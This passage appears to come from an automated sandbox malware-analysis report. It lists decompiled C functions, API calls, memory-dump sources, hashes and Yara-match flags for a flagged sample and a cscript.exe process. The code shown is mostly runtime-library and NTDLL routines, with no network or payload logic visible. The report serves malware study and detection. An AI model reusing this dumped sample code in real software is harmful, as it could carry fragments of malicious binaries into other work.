						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                            0x008b8542
                            0x008b8547
                            0x008b8561
                            0x00000000
                            0x008b8561
                            0x008b8549
                            0x008b854e
                            0x00000000
                            0x00000000
                            0x008b8553
                            0x008b8570
                            0x008b8575
                            0x008b8578
                            0x008b857f
                            0x008b859e
                            0x008b85a5
                            0x008b85a7
                            0x008b85eb
                            0x008b85fa
                            0x008b8608
                            0x008b860a
                            0x008b861a
                            0x008b861a
                            0x008b861e
                            0x008b8620
                            0x008b8623
                            0x008b8623
                            0x008b8623
                            0x008b8623
                            0x00000000
                            0x008b8629
                            0x008b860c
                            0x008b860c
                            0x008b8611
                            0x008b8611
                            0x008b8614
                            0x00000000
                            0x008b8614
                            0x008b85a9
                            0x008b85ac
                            0x008b85b0
                            0x008b85d9
                            0x008b85d9
                            0x008b85dc
                            0x008b85dc
                            0x00000000
                            0x00000000
                            0x008b85de
                            0x008b85e2
                            0x00000000
                            0x00000000
                            0x008b85e4
                            0x008b85e4
                            0x00000000
                            0x008b85e4
                            0x008b85b2
                            0x008b85b5
                            0x00000000
                            0x00000000
                            0x008b85b9
                            0x008b85cc
                            0x008b85d2
                            0x008b85d5
                            0x008b85d7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x008b85d7
                            0x008b8581
                            0x008b8584
                            0x008b8586
                            0x008b858b
                            0x008b858b
                            0x008b8590
                            0x00000000
                            0x008b8590
                            0x008b8555
                            0x008b855a
                            0x008b855e
                            0x008b855e
                            0x00000000

                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B8570
                            • __isleadbyte_l.LIBCMT ref: 008B859E
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B85CC
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B8602
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 53cb8a3ac95fc5bb6975a3e2da26e18b3decc3f4ecc540f6c83a9437afa0feff
                            • Instruction ID: 0a565f81a7d384f021c554f9ac702528e0ac5936fcd48a0797760e4dba859378
                            • Opcode Fuzzy Hash: 53cb8a3ac95fc5bb6975a3e2da26e18b3decc3f4ecc540f6c83a9437afa0feff
                            • Instruction Fuzzy Hash: D4318D3160024AEFDB319F69C849BEB7BA9FF41311F154529E865C72A1EB30D891DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B63D9, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E008B63D9(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x8c329c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x8c40d0 - _t7;
								if(__eflags == 0) {
									_t9 = E008B5065(__eflags);
									 *_t9 = E008B5078(GetLastError());
									goto L17;
								} else {
									__eflags = E008B5360(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E008B5065(__eflags);
										 *_t12 = E008B5078(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E008B5360(_t6, _t31);
						 *((intOrPtr*)(E008B5065(__eflags))) = 0xc;
						goto L12;
					} else {
						E008B42B6(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E008B6347(__ebx, __edx, __edi, _a8);
				}
			}









                            0x008b63e0
                            0x008b63ee
                            0x008b63f1
                            0x008b63f3
                            0x008b6402
                            0x008b6435
                            0x008b6435
                            0x008b6438
                            0x00000000
                            0x00000000
                            0x008b6405
                            0x008b6407
                            0x008b6409
                            0x008b6409
                            0x008b6409
                            0x008b6416
                            0x008b641c
                            0x008b641e
                            0x008b6420
                            0x008b6480
                            0x008b6480
                            0x008b6422
                            0x008b6422
                            0x008b6428
                            0x008b646a
                            0x008b647e
                            0x00000000
                            0x008b642a
                            0x008b6431
                            0x008b6433
                            0x008b6452
                            0x008b6466
                            0x008b644c
                            0x008b644c
                            0x008b644c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x008b6433
                            0x008b6428
                            0x00000000
                            0x008b644e
                            0x008b643b
                            0x008b6446
                            0x00000000
                            0x008b63f5
                            0x008b63f8
                            0x008b63fe
                            0x008b63fe
                            0x008b644f
                            0x008b6451
                            0x008b63e2
                            0x008b63ec
                            0x008b63ec

                            APIs
                            • _free.LIBCMT ref: 008B63F8
                              • Part of subcall function 008B6347: __FF_MSGBANNER.LIBCMT ref: 008B635E
                              • Part of subcall function 008B6347: __NMSG_WRITE.LIBCMT ref: 008B6365
                              • Part of subcall function 008B6347: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,008B434C,00000000,00000000,00000000,00000000,?,008B4201,00000018,008C11B8), ref: 008B638A
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID:
                            • API String ID: 1080816511-0
                            • Opcode ID: 72101d7072e8f49c94a4c05893425f4b86e4cef35ca351fe5f5d5623a18b0df1
                            • Instruction ID: 5ed14fd9dd8a0b4bc5c1a59fdb5e1a04899b06c7bdf25c33e0311d1cce1d102a
                            • Opcode Fuzzy Hash: 72101d7072e8f49c94a4c05893425f4b86e4cef35ca351fe5f5d5623a18b0df1
                            • Instruction Fuzzy Hash: 4311AC31504E15ABCB213F78AC457DA37D4FF04764F144529F909D6351FF39C861869A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B9DAD, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E008B9DAD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E008BA2FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E008B9E33(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E008BA579(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E008BA4B8(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                            0x008b9db0
                            0x008b9db6
                            0x008b9e29
                            0x00000000
                            0x008b9dbd
                            0x008b9dbd
                            0x008b9dc0
                            0x008b9ddb
                            0x008b9dde
                            0x008b9dfe
                            0x008b9e10
                            0x008b9de0
                            0x008b9de0
                            0x008b9de3
                            0x00000000
                            0x008b9de5
                            0x008b9df7
                            0x008b9df7
                            0x008b9de3
                            0x008b9e2e
                            0x008b9e32
                            0x008b9dc2
                            0x008b9dda
                            0x008b9dda
                            0x008b9dc0

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: d2fc2d763adaaa50faf8328ef8561807945ae7850971290da7cdaaacfb6c84bf
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: 8501493604414EBBCF169E88CC42CEE3F26FB18354B588519FB5899231D377C9B1AB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0137FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                            Download Yara Rule
                            C-Code - Quality: 53%
                            			E0137FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0132CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01375720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01375720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                            0x0137fdda
                            0x0137fde2
                            0x0137fde5
                            0x0137fdec
                            0x0137fdfa
                            0x0137fdff
                            0x0137fe0a
                            0x0137fe0f
                            0x0137fe17
                            0x0137fe1e
                            0x0137fe19
                            0x0137fe19
                            0x0137fe19
                            0x0137fe20
                            0x0137fe21
                            0x0137fe22
                            0x0137fe25
                            0x0137fe40

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0137FDFA
                            Strings
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0137FE2B
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0137FE01
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                            • API String ID: 885266447-3903918235
                            • Opcode ID: 704ebaa0b135f025891f91bb521a30fd713c176600800318c88a88b9469a8bfd
                            • Instruction ID: c8eb4b7cbd70e4e5268160496b04673c246bc40d0dc08e18a1398f350cd12715
                            • Opcode Fuzzy Hash: 704ebaa0b135f025891f91bb521a30fd713c176600800318c88a88b9469a8bfd
                            • Instruction Fuzzy Hash: BEF0F632200641BFE6341A59DC02F23BF6EEB44B34F240314F628565D1EA62F82097F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: cscript.exe PID: 6300 Parent PID: 3472 cscript.exeCOMMON

                            Executed Functions

                            Function 00DD81CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00DD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00DD821D
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID: .z`
                            • API String ID: 823142352-1441809116
                            • Opcode ID: fa86185a81c49599624fefefa169eeaeca1e005109dbc01ead65369f57900bc6
                            • Instruction ID: 60a008c12a5b9d788f4a498a56919bc22c7117b0ddc04dd9973032978ef02ee6
                            • Opcode Fuzzy Hash: fa86185a81c49599624fefefa169eeaeca1e005109dbc01ead65369f57900bc6
                            • Instruction Fuzzy Hash: 69110AB2600208AFCB14DF88DC85EEB37ADEF8C750F158549BA1D97241DA30E8158BB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD81D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00DD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00DD821D
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID: .z`
                            • API String ID: 823142352-1441809116
                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                            • Instruction ID: fe9d4d36b5dcfa17b843f8a78a1dce1e4b24f9dbf481327ce0706d20ac6aaa0a
                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                            • Instruction Fuzzy Hash: 5EF0B2B2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD82CA, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtReadFile.NTDLL(00DD3D62,5E972F59,FFFFFFFF,00DD3A21,?,?,00DD3D62,?,00DD3A21,FFFFFFFF,5E972F59,00DD3D62,?,00000000), ref: 00DD82C5
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: f96a8fbfa192e6e6be0b631fb0bda634d73357527ee07648345d28b17ed3389d
                            • Instruction ID: c8297b320a2f990e8456a5c1d55954af1a5b4b52fd9bcbd77d8c6a5342054568
                            • Opcode Fuzzy Hash: f96a8fbfa192e6e6be0b631fb0bda634d73357527ee07648345d28b17ed3389d
                            • Instruction Fuzzy Hash: 9FF030722012047FDB14DF98DC81DE777A9EF88710F048559FA1C8B281C630E91187F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD827A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtReadFile.NTDLL(00DD3D62,5E972F59,FFFFFFFF,00DD3A21,?,?,00DD3D62,?,00DD3A21,FFFFFFFF,5E972F59,00DD3D62,?,00000000), ref: 00DD82C5
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 690dcdf0c06d0e6e600ed5ca2d3927cc4484ad4c9eff41793375084e5323805e
                            • Instruction ID: 15e19d383a9aea6effc54cf78a356998f6f7a0db55af09b95e162226e759c378
                            • Opcode Fuzzy Hash: 690dcdf0c06d0e6e600ed5ca2d3927cc4484ad4c9eff41793375084e5323805e
                            • Instruction Fuzzy Hash: D8F0E7B2200208ABCB14DF89DC81EEB77A9EF8C714F118249BA1D97291D630E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8280, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtReadFile.NTDLL(00DD3D62,5E972F59,FFFFFFFF,00DD3A21,?,?,00DD3D62,?,00DD3A21,FFFFFFFF,5E972F59,00DD3D62,?,00000000), ref: 00DD82C5
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                            • Instruction ID: dad1284e13de33a34030dfc945756b6af8ed21681c5726590ba1831c00e52eb3
                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                            • Instruction Fuzzy Hash: 2AF0A4B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BA1D97241DA30E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD83B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00DC2D11,00002000,00003000,00000004), ref: 00DD83E9
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                            • Instruction ID: adcba28046dadc3d7f92487766407bef4c47a609800772a0d648b1d1f88cc2f2
                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                            • Instruction Fuzzy Hash: 43F015B2200208AFCB14DF89CC81EAB77ADEF88750F118149BE0897281C630F810CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD83AB, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00DC2D11,00002000,00003000,00000004), ref: 00DD83E9
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: b32edffc2077d9c81d6d1df31221ce53e59b7ffe703da5d40a95b65234fa40c4
                            • Instruction ID: 03e6fb1fbdff696bb5946fc4df64762b2e78efe7305737461908c69a8120aabb
                            • Opcode Fuzzy Hash: b32edffc2077d9c81d6d1df31221ce53e59b7ffe703da5d40a95b65234fa40c4
                            • Instruction Fuzzy Hash: 59F030B1110149AFCB15DFA8DCC4CA7BBA9FF89250B15865DF95997206C630E815CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD82FA, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtClose.NTDLL(00DD3D40,?,?,00DD3D40,00000000,FFFFFFFF), ref: 00DD8325
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 646b8664b54510d6f9ea4daae5550fecc5c5074c317063d4aa48252de84d585b
                            • Instruction ID: 0c847045ca03063bcf8c73e76281c19d0f6d69fcaedd2ff72d6848ec77f7ab8e
                            • Opcode Fuzzy Hash: 646b8664b54510d6f9ea4daae5550fecc5c5074c317063d4aa48252de84d585b
                            • Instruction Fuzzy Hash: C7E0C232200318ABD710EFD4CC45E977768EF44710F004095BE189B382D530EA0087E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtClose.NTDLL(00DD3D40,?,?,00DD3D40,00000000,FFFFFFFF), ref: 00DD8325
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                            • Instruction ID: e8c8e2b91464229e7698d1a2b0675f417dc91f319f1aade5c8996fc633ae5b09
                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                            • Instruction Fuzzy Hash: 97D012752003146BD710EF98CC45E97775DEF44750F154455BA185B282C570F90086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 19df72593f6c185a630af4486b270a311f5e10a1c9222d546ae7af946c3a245d
                            • Instruction ID: 79965724b16ef435e260c5fade9b0c8c3d47bfc50c40a555be766e3823bb3e87
                            • Opcode Fuzzy Hash: 19df72593f6c185a630af4486b270a311f5e10a1c9222d546ae7af946c3a245d
                            • Instruction Fuzzy Hash: C490047D711005031115F55D07445070057DFD53D13D1C431F1047550CD775CC717171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 053695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ce350a6e71cb6f19aef5868c963d6fe46aee0fc0e539f1cd37ba23ce1c374820
                            • Instruction ID: 0f464f05a267f07dc02d04a87654b99a42cf8f30484a672bdcb1a4b2e6780740
                            • Opcode Fuzzy Hash: ce350a6e71cb6f19aef5868c963d6fe46aee0fc0e539f1cd37ba23ce1c374820
                            • Instruction Fuzzy Hash: 309002A560200503511571594454616401A9BE0241B91C431E1045590DC56988917165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4631cefb5e53c82428cbf9f3cdc580506fc8b9974af17a2ffebedc12290c0a91
                            • Instruction ID: 6d88f2bdbc527ce541fcc9b63a54af0829e723ac0ae916e5bedd355966af348b
                            • Opcode Fuzzy Hash: 4631cefb5e53c82428cbf9f3cdc580506fc8b9974af17a2ffebedc12290c0a91
                            • Instruction Fuzzy Hash: 1E90027560100902E1106599544864600159BE0341F91D421A5055555EC6A988917171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8cfef71bc2e4ddf37b4bbd609c6dfea55a0ccae00a5a51b46f8fa8ff0d199873
                            • Instruction ID: 9dfe365f0f26c40896719175168982a1c94e4bc1b25b398117f0790258232981
                            • Opcode Fuzzy Hash: 8cfef71bc2e4ddf37b4bbd609c6dfea55a0ccae00a5a51b46f8fa8ff0d199873
                            • Instruction Fuzzy Hash: 1290026D61300502E1907159544860A00159BD1242FD1D825A0046558CC95988696361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5772cc91bca62677fa301ca5c491168eb29d81205e8cbcee5b92b2ca93b089d5
                            • Instruction ID: dae386b0863e990d42682f63e8e56e74215e4df8321c3c0396833be6ba8053e9
                            • Opcode Fuzzy Hash: 5772cc91bca62677fa301ca5c491168eb29d81205e8cbcee5b92b2ca93b089d5
                            • Instruction Fuzzy Hash: D990027571114902E1206159844470600159BD1241F91C821A0855558DC6D988917162
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8045cef7c5caea84a3be50f26df948fe2c3508a5616f65c032fe3f248dcde81d
                            • Instruction ID: 1171d16205e26d0970ab14b9e18aaa5ba3fd11331ed35a551d2e1f4221a943e0
                            • Opcode Fuzzy Hash: 8045cef7c5caea84a3be50f26df948fe2c3508a5616f65c032fe3f248dcde81d
                            • Instruction Fuzzy Hash: D990027560100D02E1907159444464A00159BD1341FD1C425A0056654DCA598A5977E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4149b0f3a4a4eddecff584c36d38cefa7026c7721178cfce23709031447e6fe4
                            • Instruction ID: 47d89847856a5f60468d0ecbe73a3a7330b9ab66e309ba05150a90c04cd2fb83
                            • Opcode Fuzzy Hash: 4149b0f3a4a4eddecff584c36d38cefa7026c7721178cfce23709031447e6fe4
                            • Instruction Fuzzy Hash: 4790027560504D42E15071594444A4600259BD0345F91C421A0095694DD6698D55B6A1
                            Uniqueness

